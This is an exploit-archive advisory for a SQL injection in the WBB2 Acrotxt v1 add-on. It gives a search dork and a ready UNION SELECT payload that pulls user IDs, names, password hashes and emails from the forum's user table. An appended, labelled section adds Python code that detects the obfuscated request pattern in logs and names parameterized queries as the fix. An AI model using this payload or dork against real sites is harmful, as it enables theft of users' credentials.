
# Title : WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability
# Published : 2007-08-27
# Author : D4m14n


####################################################################
Title: WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection
Bug by: D4m14n [11/07/2007]
Page: www.damians-world.dl.am // www.team-internet.dl.am
Dork: inurl:acrotxt.php wbb
####################################################################

SQL-Injection:
http://[target]/[path]/acrotxt.php?show=[SQL]

Example:
/acrotxt.php?show=-1'/**/UnIoN/**/SElECt/**/null,null,COnCAt(userid,', ',username,', ',password,', ',email),null,null,null,null,null/**/FroM/**/bb1_users/*

####################################################################
#    Doin' this for FUN!
#    GreetZ fly out to Trex, HANN!BAL, Eddy14, Ea$y, Kiba and many more
#
#    PS: I still hate the Black-Music-Scene...
####################################################################
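
Detection example for the request pattern above (added here, not part of the original advisory or of the add-on's code): the payload uses `/**/` comments in place of spaces and mixed-case keywords, so a plain substring signature misses it unless the `show` value is normalized first. The `/wbb2/` path, the sample request lines and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request targets, as they would appear in an access log.
SAMPLE_REQUESTS = [
    "/wbb2/acrotxt.php?show=42",
    "/wbb2/acrotxt.php?show=1'",
    "/wbb2/acrotxt.php?show=-1'/**/UnIoN/**/SElECt/**/null,null/**/FroM/**/bb1_users/*",
    "/wbb2/acrotxt.php?show=-1%27%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsElEcT%2F%2A%2A%2Fnull",
    "/wbb2/thread.php?threadid=7",
]

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")

def naive_match(request_target):
    """Plain substring signature; defeated by comment and case tricks."""
    return "union select" in request_target.lower()

def normalize(value):
    """Turn SQL comments into spaces, drop an unterminated comment, fold case."""
    value = INLINE_COMMENT.sub(" ", value)
    value = value.split("/*", 1)[0]
    return re.sub(r"\s+", " ", value).lower().strip()

def classify(request_target):
    """Return 'ignore', 'clean', 'suspicious' or 'alert' for one request."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/acrotxt.php"):
        return "ignore"
    verdict = "clean"
    # parse_qs percent-decodes each value before we inspect it.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("show", []):
        if UNION_SELECT.search(normalize(raw)):
            return "alert"
        if "'" in raw or "/*" in raw:
            verdict = "suspicious"
    return verdict

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{classify(req):10} naive={naive_match(req)!s:5} {req}")
```

Detection only covers logged GET requests; the durable fix is on the server side, binding `show` as a query parameter instead of concatenating it into the SQL string.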

# www.Syue.com [2007-08-27]